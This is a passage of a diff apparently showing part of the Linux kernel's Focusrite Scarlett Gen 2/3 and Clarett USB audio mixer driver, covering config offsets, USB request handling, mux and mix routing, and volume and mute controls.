+-	[SCARLETT2_CONFIG_PHANTOM_PERSISTENCE] = {
+-		.offset = 0x9e, .size = 8, .activate = 6 },
+-
+-	[SCARLETT2_CONFIG_MONITOR_OTHER_SWITCH] = {
+-		.offset = 0x9f, .size = 1, .activate = 10 },
+-
+-	[SCARLETT2_CONFIG_MONITOR_OTHER_ENABLE] = {
+-		.offset = 0xa0, .size = 1, .activate = 10 },
+-
+-	[SCARLETT2_CONFIG_TALKBACK_MAP] = {
+-		.offset = 0xb0, .size = 16, .activate = 10 },
+-
+-/* Clarett+ 8Pre */
+-}, {
+-	[SCARLETT2_CONFIG_DIM_MUTE] = {
+-		.offset = 0x31, .size = 8, .activate = 2 },
+-
+-	[SCARLETT2_CONFIG_LINE_OUT_VOLUME] = {
+-		.offset = 0x34, .size = 16, .activate = 1 },
+-
+-	[SCARLETT2_CONFIG_MUTE_SWITCH] = {
+-		.offset = 0x5c, .size = 8, .activate = 1 },
+-
+-	[SCARLETT2_CONFIG_SW_HW_SWITCH] = {
+-		.offset = 0x66, .size = 8, .activate = 3 },
+-
+-	[SCARLETT2_CONFIG_LEVEL_SWITCH] = {
+-		.offset = 0x7c, .size = 8, .activate = 7 },
+-
+-	[SCARLETT2_CONFIG_AIR_SWITCH] = {
+-		.offset = 0x95, .size = 8, .activate = 8 },
+-
+-	[SCARLETT2_CONFIG_STANDALONE_SWITCH] = {
+-		.offset = 0x8d, .size = 8, .activate = 6 },
+-} };
+-
+-/* proprietary request/response format */
+-struct scarlett2_usb_packet {
+-	__le32 cmd;
+-	__le16 size;
+-	__le16 seq;
+-	__le32 error;
+-	__le32 pad;
+-	u8 data[];
+-};
+-
+-static void scarlett2_fill_request_header(struct scarlett2_data *private,
+-					  struct scarlett2_usb_packet *req,
+-					  u32 cmd, u16 req_size)
+-{
+-	/* sequence must go up by 1 for each request */
+-	u16 seq = private->scarlett2_seq++;
+-
+-	req->cmd = cpu_to_le32(cmd);
+-	req->size = cpu_to_le16(req_size);
+-	req->seq = cpu_to_le16(seq);
+-	req->error = 0;
+-	req->pad = 0;
+-}
+-
+-static int scarlett2_usb_tx(struct usb_device *dev, int interface,
+-			    void *buf, u16 size)
+-{
+-	return snd_usb_ctl_msg(dev, usb_sndctrlpipe(dev, 0),
+-			SCARLETT2_USB_CMD_REQ,
+-			USB_RECIP_INTERFACE | USB_TYPE_CLASS | USB_DIR_OUT,
+-			0, interface, buf, size);
+-}
+-
+-static int scarlett2_usb_rx(struct usb_device *dev, int interface,
+-			    u32 usb_req, void *buf, u16 size)
+-{
+-	return snd_usb_ctl_msg(dev, usb_rcvctrlpipe(dev, 0),
+-			usb_req,
+-			USB_RECIP_INTERFACE | USB_TYPE_CLASS | USB_DIR_IN,
+-			0, interface, buf, size);
+-}
+-
+-/* Send a proprietary format request to the Scarlett interface */
+-static int scarlett2_usb(
+-	struct usb_mixer_interface *mixer, u32 cmd,
+-	void *req_data, u16 req_size, void *resp_data, u16 resp_size)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	struct usb_device *dev = mixer->chip->dev;
+-	struct scarlett2_usb_packet *req, *resp = NULL;
+-	size_t req_buf_size = struct_size(req, data, req_size);
+-	size_t resp_buf_size = struct_size(resp, data, resp_size);
+-	int err;
+-
+-	req = kmalloc(req_buf_size, GFP_KERNEL);
+-	if (!req) {
+-		err = -ENOMEM;
+-		goto error;
+-	}
+-
+-	resp = kmalloc(resp_buf_size, GFP_KERNEL);
+-	if (!resp) {
+-		err = -ENOMEM;
+-		goto error;
+-	}
+-
+-	mutex_lock(&private->usb_mutex);
+-
+-	/* build request message and send it */
+-
+-	scarlett2_fill_request_header(private, req, cmd, req_size);
+-
+-	if (req_size)
+-		memcpy(req->data, req_data, req_size);
+-
+-	err = scarlett2_usb_tx(dev, private->bInterfaceNumber,
+-			       req, req_buf_size);
+-
+-	if (err != req_buf_size) {
+-		usb_audio_err(
+-			mixer->chip,
+-			"Scarlett Gen 2/3 USB request result cmd %x was %d\n",
+-			cmd, err);
+-		err = -EINVAL;
+-		goto unlock;
+-	}
+-
+-	/* send a second message to get the response */
+-
+-	err = scarlett2_usb_rx(dev, private->bInterfaceNumber,
+-			       SCARLETT2_USB_CMD_RESP,
+-			       resp, resp_buf_size);
+-
+-	/* validate the response */
+-
+-	if (err != resp_buf_size) {
+-		usb_audio_err(
+-			mixer->chip,
+-			"Scarlett Gen 2/3 USB response result cmd %x was %d "
+-			"expected %zu\n",
+-			cmd, err, resp_buf_size);
+-		err = -EINVAL;
+-		goto unlock;
+-	}
+-
+-	/* cmd/seq/size should match except when initialising
+-	 * seq sent = 1, response = 0
+-	 */
+-	if (resp->cmd != req->cmd ||
+-	    (resp->seq != req->seq &&
+-		(le16_to_cpu(req->seq) != 1 || resp->seq != 0)) ||
+-	    resp_size != le16_to_cpu(resp->size) ||
+-	    resp->error ||
+-	    resp->pad) {
+-		usb_audio_err(
+-			mixer->chip,
+-			"Scarlett Gen 2/3 USB invalid response; "
+-			   "cmd tx/rx %d/%d seq %d/%d size %d/%d "
+-			   "error %d pad %d\n",
+-			le32_to_cpu(req->cmd), le32_to_cpu(resp->cmd),
+-			le16_to_cpu(req->seq), le16_to_cpu(resp->seq),
+-			resp_size, le16_to_cpu(resp->size),
+-			le32_to_cpu(resp->error),
+-			le32_to_cpu(resp->pad));
+-		err = -EINVAL;
+-		goto unlock;
+-	}
+-
+-	if (resp_data && resp_size > 0)
+-		memcpy(resp_data, resp->data, resp_size);
+-
+-unlock:
+-	mutex_unlock(&private->usb_mutex);
+-error:
+-	kfree(req);
+-	kfree(resp);
+-	return err;
+-}
+-
+-/* Send a USB message to get data; result placed in *buf */
+-static int scarlett2_usb_get(
+-	struct usb_mixer_interface *mixer,
+-	int offset, void *buf, int size)
+-{
+-	struct {
+-		__le32 offset;
+-		__le32 size;
+-	} __packed req;
+-
+-	req.offset = cpu_to_le32(offset);
+-	req.size = cpu_to_le32(size);
+-	return scarlett2_usb(mixer, SCARLETT2_USB_GET_DATA,
+-			     &req, sizeof(req), buf, size);
+-}
+-
+-/* Send a USB message to get configuration parameters; result placed in *buf */
+-static int scarlett2_usb_get_config(
+-	struct usb_mixer_interface *mixer,
+-	int config_item_num, int count, void *buf)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const struct scarlett2_config *config_item =
+-		&scarlett2_config_items[info->config_set][config_item_num];
+-	int size, err, i;
+-	u8 *buf_8;
+-	u8 value;
+-
+-	/* For byte-sized parameters, retrieve directly into buf */
+-	if (config_item->size >= 8) {
+-		size = config_item->size / 8 * count;
+-		err = scarlett2_usb_get(mixer, config_item->offset, buf, size);
+-		if (err < 0)
+-			return err;
+-		if (size == 2) {
+-			u16 *buf_16 = buf;
+-
+-			for (i = 0; i < count; i++, buf_16++)
+-				*buf_16 = le16_to_cpu(*(__le16 *)buf_16);
+-		}
+-		return 0;
+-	}
+-
+-	/* For bit-sized parameters, retrieve into value */
+-	err = scarlett2_usb_get(mixer, config_item->offset, &value, 1);
+-	if (err < 0)
+-		return err;
+-
+-	/* then unpack from value into buf[] */
+-	buf_8 = buf;
+-	for (i = 0; i < 8 && i < count; i++, value >>= 1)
+-		*buf_8++ = value & 1;
+-
+-	return 0;
+-}
+-
+-/* Send SCARLETT2_USB_DATA_CMD SCARLETT2_USB_CONFIG_SAVE */
+-static void scarlett2_config_save(struct usb_mixer_interface *mixer)
+-{
+-	__le32 req = cpu_to_le32(SCARLETT2_USB_CONFIG_SAVE);
+-
+-	int err = scarlett2_usb(mixer, SCARLETT2_USB_DATA_CMD,
+-				&req, sizeof(u32),
+-				NULL, 0);
+-	if (err < 0)
+-		usb_audio_err(mixer->chip, "config save failed: %d\n", err);
+-}
+-
+-/* Delayed work to save config */
+-static void scarlett2_config_save_work(struct work_struct *work)
+-{
+-	struct scarlett2_data *private =
+-		container_of(work, struct scarlett2_data, work.work);
+-
+-	scarlett2_config_save(private->mixer);
+-}
+-
+-/* Send a USB message to set a SCARLETT2_CONFIG_* parameter */
+-static int scarlett2_usb_set_config(
+-	struct usb_mixer_interface *mixer,
+-	int config_item_num, int index, int value)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const struct scarlett2_config *config_item =
+-	       &scarlett2_config_items[info->config_set][config_item_num];
+-	struct {
+-		__le32 offset;
+-		__le32 bytes;
+-		__le32 value;
+-	} __packed req;
+-	__le32 req2;
+-	int offset, size;
+-	int err;
+-
+-	/* Cancel any pending NVRAM save */
+-	cancel_delayed_work_sync(&private->work);
+-
+-	/* Convert config_item->size in bits to size in bytes and
+-	 * calculate offset
+-	 */
+-	if (config_item->size >= 8) {
+-		size = config_item->size / 8;
+-		offset = config_item->offset + index * size;
+-
+-	/* If updating a bit, retrieve the old value, set/clear the
+-	 * bit as needed, and update value
+-	 */
+-	} else {
+-		u8 tmp;
+-
+-		size = 1;
+-		offset = config_item->offset;
+-
+-		err = scarlett2_usb_get(mixer, offset, &tmp, 1);
+-		if (err < 0)
+-			return err;
+-
+-		if (value)
+-			tmp |= (1 << index);
+-		else
+-			tmp &= ~(1 << index);
+-
+-		value = tmp;
+-	}
+-
+-	/* Send the configuration parameter data */
+-	req.offset = cpu_to_le32(offset);
+-	req.bytes = cpu_to_le32(size);
+-	req.value = cpu_to_le32(value);
+-	err = scarlett2_usb(mixer, SCARLETT2_USB_SET_DATA,
+-			    &req, sizeof(u32) * 2 + size,
+-			    NULL, 0);
+-	if (err < 0)
+-		return err;
+-
+-	/* Activate the change */
+-	req2 = cpu_to_le32(config_item->activate);
+-	err = scarlett2_usb(mixer, SCARLETT2_USB_DATA_CMD,
+-			    &req2, sizeof(req2), NULL, 0);
+-	if (err < 0)
+-		return err;
+-
+-	/* Schedule the change to be written to NVRAM */
+-	if (config_item->activate != SCARLETT2_USB_CONFIG_SAVE)
+-		schedule_delayed_work(&private->work, msecs_to_jiffies(2000));
+-
+-	return 0;
+-}
+-
+-/* Send a USB message to get sync status; result placed in *sync */
+-static int scarlett2_usb_get_sync_status(
+-	struct usb_mixer_interface *mixer,
+-	u8 *sync)
+-{
+-	__le32 data;
+-	int err;
+-
+-	err = scarlett2_usb(mixer, SCARLETT2_USB_GET_SYNC,
+-			    NULL, 0, &data, sizeof(data));
+-	if (err < 0)
+-		return err;
+-
+-	*sync = !!data;
+-	return 0;
+-}
+-
+-/* Send a USB message to get volume status; result placed in *buf */
+-static int scarlett2_usb_get_volume_status(
+-	struct usb_mixer_interface *mixer,
+-	struct scarlett2_usb_volume_status *buf)
+-{
+-	return scarlett2_usb_get(mixer, SCARLETT2_USB_VOLUME_STATUS_OFFSET,
+-				 buf, sizeof(*buf));
+-}
+-
+-/* Send a USB message to get the volumes for all inputs of one mix
+- * and put the values into private->mix[]
+- */
+-static int scarlett2_usb_get_mix(struct usb_mixer_interface *mixer,
+-				 int mix_num)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-
+-	int num_mixer_in =
+-		info->port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_OUT];
+-	int err, i, j, k;
+-
+-	struct {
+-		__le16 mix_num;
+-		__le16 count;
+-	} __packed req;
+-
+-	__le16 data[SCARLETT2_INPUT_MIX_MAX];
+-
+-	req.mix_num = cpu_to_le16(mix_num);
+-	req.count = cpu_to_le16(num_mixer_in);
+-
+-	err = scarlett2_usb(mixer, SCARLETT2_USB_GET_MIX,
+-			    &req, sizeof(req),
+-			    data, num_mixer_in * sizeof(u16));
+-	if (err < 0)
+-		return err;
+-
+-	for (i = 0, j = mix_num * num_mixer_in; i < num_mixer_in; i++, j++) {
+-		u16 mixer_value = le16_to_cpu(data[i]);
+-
+-		for (k = 0; k < SCARLETT2_MIXER_VALUE_COUNT; k++)
+-			if (scarlett2_mixer_values[k] >= mixer_value)
+-				break;
+-		if (k == SCARLETT2_MIXER_VALUE_COUNT)
+-			k = SCARLETT2_MIXER_MAX_VALUE;
+-		private->mix[j] = k;
+-	}
+-
+-	return 0;
+-}
+-
+-/* Send a USB message to set the volumes for all inputs of one mix
+- * (values obtained from private->mix[])
+- */
+-static int scarlett2_usb_set_mix(struct usb_mixer_interface *mixer,
+-				 int mix_num)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-
+-	struct {
+-		__le16 mix_num;
+-		__le16 data[SCARLETT2_INPUT_MIX_MAX];
+-	} __packed req;
+-
+-	int i, j;
+-	int num_mixer_in =
+-		info->port_count[SCARLETT2_PORT_TYPE_MIX][SCARLETT2_PORT_OUT];
+-
+-	req.mix_num = cpu_to_le16(mix_num);
+-
+-	for (i = 0, j = mix_num * num_mixer_in; i < num_mixer_in; i++, j++)
+-		req.data[i] = cpu_to_le16(
+-			scarlett2_mixer_values[private->mix[j]]
+-		);
+-
+-	return scarlett2_usb(mixer, SCARLETT2_USB_SET_MIX,
+-			     &req, (num_mixer_in + 1) * sizeof(u16),
+-			     NULL, 0);
+-}
+-
+-/* Convert a port number index (per info->port_count) to a hardware ID */
+-static u32 scarlett2_mux_src_num_to_id(
+-	const int port_count[][SCARLETT2_PORT_DIRNS], int num)
+-{
+-	int port_type;
+-
+-	for (port_type = 0;
+-	     port_type < SCARLETT2_PORT_TYPE_COUNT;
+-	     port_type++) {
+-		if (num < port_count[port_type][SCARLETT2_PORT_IN])
+-			return scarlett2_ports[port_type].id | num;
+-		num -= port_count[port_type][SCARLETT2_PORT_IN];
+-	}
+-
+-	/* Oops */
+-	return 0;
+-}
+-
+-/* Convert a hardware ID to a port number index */
+-static u32 scarlett2_mux_id_to_num(
+-	const int port_count[][SCARLETT2_PORT_DIRNS], int direction, u32 id)
+-{
+-	int port_type;
+-	int port_num = 0;
+-
+-	for (port_type = 0;
+-	     port_type < SCARLETT2_PORT_TYPE_COUNT;
+-	     port_type++) {
+-		int base = scarlett2_ports[port_type].id;
+-		int count = port_count[port_type][direction];
+-
+-		if (id >= base && id < base + count)
+-			return port_num + id - base;
+-		port_num += count;
+-	}
+-
+-	/* Oops */
+-	return -1;
+-}
+-
+-/* Convert one mux entry from the interface and load into private->mux[] */
+-static void scarlett2_usb_populate_mux(struct scarlett2_data *private,
+-				       u32 mux_entry)
+-{
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-
+-	int dst_idx, src_idx;
+-
+-	dst_idx = scarlett2_mux_id_to_num(port_count, SCARLETT2_PORT_OUT,
+-					  mux_entry & 0xFFF);
+-	if (dst_idx < 0)
+-		return;
+-
+-	if (dst_idx >= private->num_mux_dsts) {
+-		usb_audio_err(private->mixer->chip,
+-			"BUG: scarlett2_mux_id_to_num(%06x, OUT): %d >= %d",
+-			mux_entry, dst_idx, private->num_mux_dsts);
+-		return;
+-	}
+-
+-	src_idx = scarlett2_mux_id_to_num(port_count, SCARLETT2_PORT_IN,
+-					  mux_entry >> 12);
+-	if (src_idx < 0)
+-		return;
+-
+-	if (src_idx >= private->num_mux_srcs) {
+-		usb_audio_err(private->mixer->chip,
+-			"BUG: scarlett2_mux_id_to_num(%06x, IN): %d >= %d",
+-			mux_entry, src_idx, private->num_mux_srcs);
+-		return;
+-	}
+-
+-	private->mux[dst_idx] = src_idx;
+-}
+-
+-/* Send USB message to get mux inputs and then populate private->mux[] */
+-static int scarlett2_usb_get_mux(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	int count = private->num_mux_dsts;
+-	int err, i;
+-
+-	struct {
+-		__le16 num;
+-		__le16 count;
+-	} __packed req;
+-
+-	__le32 data[SCARLETT2_MUX_MAX];
+-
+-	private->mux_updated = 0;
+-
+-	req.num = 0;
+-	req.count = cpu_to_le16(count);
+-
+-	err = scarlett2_usb(mixer, SCARLETT2_USB_GET_MUX,
+-			    &req, sizeof(req),
+-			    data, count * sizeof(u32));
+-	if (err < 0)
+-		return err;
+-
+-	for (i = 0; i < count; i++)
+-		scarlett2_usb_populate_mux(private, le32_to_cpu(data[i]));
+-
+-	return 0;
+-}
+-
+-/* Send USB messages to set mux inputs */
+-static int scarlett2_usb_set_mux(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int table;
+-
+-	struct {
+-		__le16 pad;
+-		__le16 num;
+-		__le32 data[SCARLETT2_MUX_MAX];
+-	} __packed req;
+-
+-	req.pad = 0;
+-
+-	/* set mux settings for each rate */
+-	for (table = 0; table < SCARLETT2_MUX_TABLES; table++) {
+-		const struct scarlett2_mux_entry *entry;
+-
+-		/* i counts over the output array */
+-		int i = 0, err;
+-
+-		req.num = cpu_to_le16(table);
+-
+-		/* loop through each entry */
+-		for (entry = info->mux_assignment[table];
+-		     entry->count;
+-		     entry++) {
+-			int j;
+-			int port_type = entry->port_type;
+-			int port_idx = entry->start;
+-			int mux_idx = scarlett2_get_port_start_num(port_count,
+-				SCARLETT2_PORT_OUT, port_type) + port_idx;
+-			int dst_id = scarlett2_ports[port_type].id + port_idx;
+-
+-			/* Empty slots */
+-			if (!dst_id) {
+-				for (j = 0; j < entry->count; j++)
+-					req.data[i++] = 0;
+-				continue;
+-			}
+-
+-			/* Non-empty mux slots use the lower 12 bits
+-			 * for the destination and next 12 bits for
+-			 * the source
+-			 */
+-			for (j = 0; j < entry->count; j++) {
+-				int src_id = scarlett2_mux_src_num_to_id(
+-					port_count, private->mux[mux_idx++]);
+-				req.data[i++] = cpu_to_le32(dst_id |
+-							    src_id << 12);
+-				dst_id++;
+-			}
+-		}
+-
+-		err = scarlett2_usb(mixer, SCARLETT2_USB_SET_MUX,
+-				    &req, (i + 1) * sizeof(u32),
+-				    NULL, 0);
+-		if (err < 0)
+-			return err;
+-	}
+-
+-	return 0;
+-}
+-
+-/* Send USB message to get meter levels */
+-static int scarlett2_usb_get_meter_levels(struct usb_mixer_interface *mixer,
+-					  u16 num_meters, u16 *levels)
+-{
+-	struct {
+-		__le16 pad;
+-		__le16 num_meters;
+-		__le32 magic;
+-	} __packed req;
+-	u32 resp[SCARLETT2_MAX_METERS];
+-	int i, err;
+-
+-	req.pad = 0;
+-	req.num_meters = cpu_to_le16(num_meters);
+-	req.magic = cpu_to_le32(SCARLETT2_USB_METER_LEVELS_GET_MAGIC);
+-	err = scarlett2_usb(mixer, SCARLETT2_USB_GET_METER,
+-			    &req, sizeof(req), resp, num_meters * sizeof(u32));
+-	if (err < 0)
+-		return err;
+-
+-	/* copy, convert to u16 */
+-	for (i = 0; i < num_meters; i++)
+-		levels[i] = resp[i];
+-
+-	return 0;
+-}
+-
+-/*** Control Functions ***/
+-
+-/* helper function to create a new control */
+-static int scarlett2_add_new_ctl(struct usb_mixer_interface *mixer,
+-				 const struct snd_kcontrol_new *ncontrol,
+-				 int index, int channels, const char *name,
+-				 struct snd_kcontrol **kctl_return)
+-{
+-	struct snd_kcontrol *kctl;
+-	struct usb_mixer_elem_info *elem;
+-	int err;
+-
+-	elem = kzalloc(sizeof(*elem), GFP_KERNEL);
+-	if (!elem)
+-		return -ENOMEM;
+-
+-	/* We set USB_MIXER_BESPOKEN type, so that the core USB mixer code
+-	 * ignores them for resume and other operations.
+-	 * Also, the head.id field is set to 0, as we don't use this field.
+-	 */
+-	elem->head.mixer = mixer;
+-	elem->control = index;
+-	elem->head.id = 0;
+-	elem->channels = channels;
+-	elem->val_type = USB_MIXER_BESPOKEN;
+-
+-	kctl = snd_ctl_new1(ncontrol, elem);
+-	if (!kctl) {
+-		kfree(elem);
+-		return -ENOMEM;
+-	}
+-	kctl->private_free = snd_usb_mixer_elem_free;
+-
+-	strscpy(kctl->id.name, name, sizeof(kctl->id.name));
+-
+-	err = snd_usb_mixer_add_control(&elem->head, kctl);
+-	if (err < 0)
+-		return err;
+-
+-	if (kctl_return)
+-		*kctl_return = kctl;
+-
+-	return 0;
+-}
+-
+-/*** Sync Control ***/
+-
+-/* Update sync control after receiving notification that the status
+- * has changed
+- */
+-static int scarlett2_update_sync(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	private->sync_updated = 0;
+-	return scarlett2_usb_get_sync_status(mixer, &private->sync);
+-}
+-
+-static int scarlett2_sync_ctl_info(struct snd_kcontrol *kctl,
+-				   struct snd_ctl_elem_info *uinfo)
+-{
+-	static const char *texts[2] = {
+-		"Unlocked", "Locked"
+-	};
+-	return snd_ctl_enum_info(uinfo, 1, 2, texts);
+-}
+-
+-static int scarlett2_sync_ctl_get(struct snd_kcontrol *kctl,
+-				  struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->sync_updated) {
+-		err = scarlett2_update_sync(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.enumerated.item[0] = private->sync;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_sync_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.access = SNDRV_CTL_ELEM_ACCESS_READ,
+-	.name = "",
+-	.info = scarlett2_sync_ctl_info,
+-	.get  = scarlett2_sync_ctl_get
+-};
+-
+-static int scarlett2_add_sync_ctl(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-
+-	/* devices without a mixer also don't support reporting sync status */
+-	if (private->info->config_set == SCARLETT2_CONFIG_SET_NO_MIXER)
+-		return 0;
+-
+-	return scarlett2_add_new_ctl(mixer, &scarlett2_sync_ctl,
+-				     0, 1, "Sync Status", &private->sync_ctl);
+-}
+-
+-/*** Analogue Line Out Volume Controls ***/
+-
+-/* Update hardware volume controls after receiving notification that
+- * they have changed
+- */
+-static int scarlett2_update_volumes(struct usb_mixer_interface *mixer)
+-{
+-	struct scarlett2_data *private = mixer->private_data;
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	struct scarlett2_usb_volume_status volume_status;
+-	int num_line_out =
+-		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+-	int err, i;
+-	int mute;
+-
+-	private->vol_updated = 0;
+-
+-	err = scarlett2_usb_get_volume_status(mixer, &volume_status);
+-	if (err < 0)
+-		return err;
+-
+-	private->master_vol = clamp(
+-		volume_status.master_vol + SCARLETT2_VOLUME_BIAS,
+-		0, SCARLETT2_VOLUME_BIAS);
+-
+-	if (info->line_out_hw_vol)
+-		for (i = 0; i < SCARLETT2_DIM_MUTE_COUNT; i++)
+-			private->dim_mute[i] = !!volume_status.dim_mute[i];
+-
+-	mute = private->dim_mute[SCARLETT2_BUTTON_MUTE];
+-
+-	for (i = 0; i < num_line_out; i++)
+-		if (private->vol_sw_hw_switch[i]) {
+-			private->vol[i] = private->master_vol;
+-			private->mute_switch[i] = mute;
+-		}
+-
+-	return 0;
+-}
+-
+-static int scarlett2_volume_ctl_info(struct snd_kcontrol *kctl,
+-				     struct snd_ctl_elem_info *uinfo)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-
+-	uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
+-	uinfo->count = elem->channels;
+-	uinfo->value.integer.min = 0;
+-	uinfo->value.integer.max = SCARLETT2_VOLUME_BIAS;
+-	uinfo->value.integer.step = 1;
+-	return 0;
+-}
+-
+-static int scarlett2_master_volume_ctl_get(struct snd_kcontrol *kctl,
+-					   struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->vol_updated) {
+-		err = scarlett2_update_volumes(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.integer.value[0] = private->master_vol;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int line_out_remap(struct scarlett2_data *private, int index)
+-{
+-	const struct scarlett2_device_info *info = private->info;
+-	const int (*port_count)[SCARLETT2_PORT_DIRNS] = info->port_count;
+-	int line_out_count =
+-		port_count[SCARLETT2_PORT_TYPE_ANALOGUE][SCARLETT2_PORT_OUT];
+-
+-	if (!info->line_out_remap_enable)
+-		return index;
+-
+-	if (index >= line_out_count)
+-		return index;
+-
+-	return info->line_out_remap[index];
+-}
+-
+-static int scarlett2_volume_ctl_get(struct snd_kcontrol *kctl,
+-				    struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int index = line_out_remap(private, elem->control);
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->vol_updated) {
+-		err = scarlett2_update_volumes(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.integer.value[0] = private->vol[index];
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_volume_ctl_put(struct snd_kcontrol *kctl,
+-				    struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int index = line_out_remap(private, elem->control);
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->vol[index];
+-	val = ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->vol[index] = val;
+-	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_LINE_OUT_VOLUME,
+-				       index, val - SCARLETT2_VOLUME_BIAS);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const DECLARE_TLV_DB_MINMAX(
+-	db_scale_scarlett2_gain, -SCARLETT2_VOLUME_BIAS * 100, 0
+-);
+-
+-static const struct snd_kcontrol_new scarlett2_master_volume_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.access = SNDRV_CTL_ELEM_ACCESS_READ |
+-		  SNDRV_CTL_ELEM_ACCESS_TLV_READ,
+-	.name = "",
+-	.info = scarlett2_volume_ctl_info,
+-	.get  = scarlett2_master_volume_ctl_get,
+-	.private_value = 0, /* max value */
+-	.tlv = { .p = db_scale_scarlett2_gain }
+-};
+-
+-static const struct snd_kcontrol_new scarlett2_line_out_volume_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.access = SNDRV_CTL_ELEM_ACCESS_READWRITE |
+-		  SNDRV_CTL_ELEM_ACCESS_TLV_READ,
+-	.name = "",
+-	.info = scarlett2_volume_ctl_info,
+-	.get  = scarlett2_volume_ctl_get,
+-	.put  = scarlett2_volume_ctl_put,
+-	.private_value = 0, /* max value */
+-	.tlv = { .p = db_scale_scarlett2_gain }
+-};
+-
+-/*** Mute Switch Controls ***/
+-
+-static int scarlett2_mute_ctl_get(struct snd_kcontrol *kctl,
+-					struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int index = line_out_remap(private, elem->control);
+-	int err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	if (private->vol_updated) {
+-		err = scarlett2_update_volumes(mixer);
+-		if (err < 0)
+-			goto unlock;
+-	}
+-	ucontrol->value.integer.value[0] = private->mute_switch[index];
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static int scarlett2_mute_ctl_put(struct snd_kcontrol *kctl,
+-					struct snd_ctl_elem_value *ucontrol)
+-{
+-	struct usb_mixer_elem_info *elem = kctl->private_data;
+-	struct usb_mixer_interface *mixer = elem->head.mixer;
+-	struct scarlett2_data *private = mixer->private_data;
+-	int index = line_out_remap(private, elem->control);
+-	int oval, val, err = 0;
+-
+-	mutex_lock(&private->data_mutex);
+-
+-	oval = private->mute_switch[index];
+-	val = !!ucontrol->value.integer.value[0];
+-
+-	if (oval == val)
+-		goto unlock;
+-
+-	private->mute_switch[index] = val;
+-
+-	/* Send mute change to the device */
+-	err = scarlett2_usb_set_config(mixer, SCARLETT2_CONFIG_MUTE_SWITCH,
+-				       index, val);
+-	if (err == 0)
+-		err = 1;
+-
+-unlock:
+-	mutex_unlock(&private->data_mutex);
+-	return err;
+-}
+-
+-static const struct snd_kcontrol_new scarlett2_mute_ctl = {
+-	.iface = SNDRV_CTL_ELEM_IFACE_MIXER,
+-	.name = "",
+-	.info = snd_ctl_boolean_mono_info,
+-	.get  = scarlett2_mute_ctl_get,
+-	.put  = scarlett2_mute_ctl_put,
+-};
+-
+-/*** HW/SW Volume Switch Controls ***/
+-
+-static void scarlett2_sw_hw_ctl_ro(struct scarlett2_data *private, int index)
+-{
+-	private->sw_hw_ctls[index]->vd[0].access &=
+-		~SNDRV_CTL_ELEM_ACCESS_WRITE;
+-}
+-
